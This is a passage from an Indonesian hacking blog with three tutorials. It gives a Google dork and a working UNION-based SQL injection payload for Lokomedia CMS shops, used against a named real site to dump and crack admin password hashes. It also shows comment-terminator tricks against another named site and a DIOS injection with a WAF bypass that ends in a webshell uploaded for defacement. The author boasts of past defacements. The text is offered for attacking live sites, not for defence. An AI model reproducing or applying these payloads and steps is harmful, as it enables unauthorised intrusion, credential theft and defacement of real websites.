Thursday, December 15, 2016

Exploit Toko online CMS Lokomedia

Kali ini saya ingin berbagi sebuah exploit khusus web toko online yang menggunakan cms lokomedia..
yap ini masih sedikit fresh dan pernah saya gunakan dahulu pada saat merayakan 17 agustus 2016 dan tentunya masih banyak yang perawan :D
jika ingin melihat hasilnya bisa lihat saja di https://www.defacer.id/hacker/orie404.html,
oke langsung saja ke tutorialnya.

Dork    : inurl:media.php?module=detailproduk
exploit  : concat(0x696e6a656b206279206f726965343034,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(admins)where@:=make_set(511,@,0x3c6c693e,username,password)),@))
langsung saja kita masukan dorknya di google :

 dan lihat hasilnya sekitar 24.100 hasil yang bisa di hasilkan dari google.
langsung saja kita pilih salah satu webnya.
di sini saya memilih web yg paling atas yaitu :
http://www.toyotatangerangkota.com/media.php?module=detailproduk&id=57

 

Langsung saja kita injek ke inhek pointnya.
Disini saya pilih injek pointya di url id=57  kita cek vuln atau tidaknya web ini dengan memberi tanda kutip ( ' ) di blakang angka 57 tersebut.


Bisa kita lihat setelah kita memberikan injek point pada angka 57 ternyata gambar menghilang dan ini bisa di katakan 80% vuln sqli.
pasti ada pertanyaan knapa gambar menghilang bisa di katakan vuln sqli ?
pada dasarnya kita melihat pasti seorang injektor bukan hanya berpatokan pada munculnyq mysql_error, syntax_error atau yg lain - lainya itu, karena bisa juga kita melihat dari tulisan atau gambar yang menghilang saat di berikan injek point.

oke kita lanjut, selanjutnya kita cek kembali di balakang injek poin / tanda kutip ( ' ) kita tambahkan +--+  jika gambar atau tulisan yang tadinya hilang pada saat kita beri kutip kembali sperti semula bisa di katakn itu 100 % vuln.



Selanjutnya kita tinggal meng order by jumlah columnya yg ada.
di sni saya mendaptkan pada saat order by di angka 14 gambar menghilang sama seperti saat kita pertama memberi injek point.

 
Di sini saya mendapatkan error di angka 14 otomatis jumlah column yang tidak error ada 13 columns sekarang kita tinggal memberikan union all select untuk mencari nomer togelnya :D

 

Muncul angka togelnya yaitu angka 3,4,5,6,dan 11.

setlah itu tinggal masukan exploitnya di angka togelnya. seperti ini :http://www.toyotatangerangkota.com/media.php?module=detailproduk&id=-57'+UNION+ALL+SELECT+1,2,concat(0x696e6a656b206279206f726965343034,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(admins)where@:=make_set(511,@,0x3c6c693e,username,password)),@)),4,5,6,7,8,9,10,11,12,13+--+
kita bisa langsung melihat hasilnya :



kita langsung mendaptkan hasilnya yaitu username dan password md5
untuk men hash password md5 kita bisa kunjungi https://hashkiller.co.uk/md5-decrypter.aspx

copy paste password md5nya di MD5 Hashes seperti ini :

 Kendala dari exploit ini yaitu terkadang kita selalu galgal mend decrypt hash md5 kita yang telah kita dapat :


Tapi jangan khawatir saya punya solusinya kita tinggal hapus angka 0 di paling akhir menjadi sperti ini dan lihat hasilnya :


Kita bisa lihat hasil exploit yg saya gunakan untuk web yg lain.:

 



Sekian dari saya, sebuah exploit untuk web toko online yang ber CMS lokomedia.
untuk menu adminya kita bisa menggunakan default lokomedia :D


Null Comments pada SQLi

Kali  ini saya ingin menjelask tentang Null Byte pada sqli pada SQLINull Byte pada umumnya terdiri -- , --+, --+- , %23 , %60 , ; dan lain lain.

Langsung saja ke perakteknya di sini saya sudah mempunyai sebuah target yaitu
www.sankalpa.it/ita/evento.php?id_new=56




langsung saja kita beri injek point pada web tersbut, saya memilih injek pointnya di belakang angka 56

Tara kita mendapatkan sebuah pesan error yang saya beri tanda di dalam kotak warna merah.
sekrang kita mencoba satu persatu Byete pada SQLi

Sekarang saya mencoba menggunkan byte +--+ dan ini hasilnya :


Kita lihat ternyata tidak berfungsi byte +--+ malahan masih menampilkan sebuah error begitupun menggunakan byte -- , --+- , %20, %60.

Sekarang kita mencoba menggunakan menggunakn Null Byte  ( ; ) dan ini hasilnya :



Kita bisa lihat di sini kita bisa melihat webnya tidak memunculkan pesan error lagi tetapi kembali sperti semula.
Terus selanjutanya kita tinggal menggunakan order by sampai menemukan jumlah column yang tidak error:

evento.php?id_new=56'order by 1;
evento.php?id_new=56'order by 2;
dan seterusnya sampai menemukan jumlah columnnya.

Disini saya menemukan pesan error berada di angka 6 :


selanjutnya kita tinggal menggunakan union all select sampai jumlah column yg tidak error:

Disini kita bisa lihat langsung muncul nomer togelnya pada saat union select :D
selanjutnya kita bisa menggunakan DIOS ataupun hanya sekedar menampilkan versi dan databasenya saja :






Sekian penjelasan tentang Null Byte pada SQLi

Wednesday, December 14, 2016

Tutorial bypass SQLi basic menggunakan DIOS

Oke gan kali ini saya akan sidikit memberi tahu apa kegunaan dan yang di maksud dengan DIOS (Dump In One Shot).
DIOS (Dump In One Shot) adalah suatu metode yang sangat simpel dalam penginjeksian sql dimna suatu web memeliki sebuah celah injeksi, kata - kata DIOS SQLi sepertinya sudah tidak asing lagi bagi para injecktor ☺.

Bahan - bahanya : Hackbar MOD, tanpa Temper Data, Shell, Dan tentunya scipt deface kita.


Oke langsung saja langsung perakteknya.

Di sini saya sudah menemukan sebuah target dmna targetnya sangat rentan terhadap sebuah injeksi



Setelah itu tinggal cari sebuah injek pointnya saya memelih beri sebuah tanda kutip( ' ) di blakang tanda angka 1 untuk injek pointnya maka muncul sebuah pringatan seperti yg di tandai kotak berwarna merah :


Setelah muncul seperti itu berarti 80% web tersebut vuln.
kemudian di berikan tanda +--+ atau --+- di blakang tanda kutip tadi:


Jika artikel tersebut kembali sperti semula bisa di katakan 100% vuln.
dan setelah itu kita langsung saja ke langkah selanjutnya yaitu memberi order by sampai jumlah column yang ada. contoh :

id_artikel=1' order by 1+--+ (masih seperti semula)
id_artikel=1' order by 2+--+ (masih seperti semula)
id_artikel=1' order by dan seterusnya sampai menemukan jumlah columns errornya
di sini saya menekuman error di angka 7+--+:

Setelah kita mengetahui jumlah column yg error selanjutanya kita tinggal, memberi union all select sampai jumlah column yg seblom error tadi misalnya kita menemukan error di angka 7 berarti jumlah column yg tidak error ada 6, di sini saya menggunakan fitur dari hackbar mod dimana saya melakukanya dengan memilih menu UNION BASED → Union Statment → INT,INT stelah itu muncul Java Script Aplication kemudian ganti anka 10 dengan jumlah columns yg tidak error tadi:




dan jangan lupa beri tanda min ( - ) di depan angka 1 tadi dan hasilnya seperti ini :

WTF men malah muncul 403 forbiden, tapi jangan khwawatir kita di sini kita bisa melakuka mem-bypass sqli dengan cara seperti berikut:
Blok tulisan UNION→ pilih WAF BYPASS dalam menu hack bar di sini saya menggunkan /*!50000_STRING_*/
 






Setelah di beri bypass UNION nya tinggal execute dan hasilnya :
 
Muncul juga angka keberuntungan yg kita cari.
setelah itu kita tinggal pilih angka yg error tersebut. di sini saya memilih angka 2 untuk melakukan DIOS,
di sini saya memilih DIOS by Madblood untuk melakukannya bisa melakukan langkah - langkah berikut:
 

Setelah itu tinggal execute dan tara hasilnya kita bisa lihat hasilnya:

Setelah itu bagaimana kita bisa menemukan username dan password adminnya ?
Tinnggal cari table yg kira - kira menyimpan username dan password.
atau kita bisa juga menggunakan menu find atau bisa juga dengan cara menukan CTRL + F kemudian ketik password dan secara otomatis kita akan langsung dimana text password itu berada.


Terus bagaimana cara membuka table dan columnya ?
di sini saya menggunakan cara simppel tak perlu group_concat, tinggal edit sedikit DIOS yg tadi kita gunakan saja.
saya mengedit sedkit di bagian (information_schema.columns) menjadi (adm), (table_name) menjadi (username), (column_name) menjadi (password), kemudian kita execute dan lihat hasilnya :

kita langsung mendapatkan username dan passwordnya, dimna "aa" sebagai username dan "123" sebagai passwordnya. selanjutnya kita jajal login dengan username dan password yang sudah di dapatkan.

 

Dan tara kita bisa masuk dengan username dan password yg tadi kita sudah dapatkan.
selanjutnya kita tinggal upload shell, di sini saya menggunkan fitur Tambah Artikel pada dimana pada menu tersebut tersedia tempat upload Gambar.
kita coba upload shell kita d sini tanpa harus mem - bypass shell kita sehingga tak perlu menggunakan temper data:

 
dan lihat hasil yg tadi kita upload tadi di menu artikel klik kanan view image yg tadi kita upload shell tadi :

 
kemudian lihat hasilnya :

Shell berhasil di pasang sama kita, pasti kalian sudah tau kan kalo shell sudah bisa di tanem :D

sekian Tutorial cara mudah by pass SQLI menggunakan DIOS

 
Cool Blue Outer Glow Pointer